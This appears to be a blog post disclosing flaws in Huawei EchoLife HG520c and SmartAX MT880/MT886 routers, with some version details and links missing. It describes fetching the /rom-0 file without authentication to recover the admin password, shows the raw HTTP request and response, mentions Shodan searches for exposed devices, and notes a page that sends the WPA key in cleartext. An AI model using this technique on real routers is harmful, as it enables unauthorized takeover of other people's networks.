Huawei Routers Multiple Vulnerabilities

The Huawei EchoLife HG520c router (Shodan search) contains a way to bypass authentication. If you request the /rom-0 file it does not require authentication. This can be reversed using available tools like the one at The first string returned is the admin password. I tested the following firmware version: This also affects the Huawei SmartAX MT880 (Shodan search) running firmware, and the MT886 running This is due to use of RomPager as the underlying server.

GET /rom-0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Fri, 07 Jan 2000 06:11:11 GMT
Last-Modified: Tue, 07 Jan 1930 06:11:11 GMT
Content-Length: 16384
Server: RomPager/4.07 UPnP/1.0



Also the /home_wlan.html page will send the cleartext WPA shared key over HTTP.


Tags: , ,

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: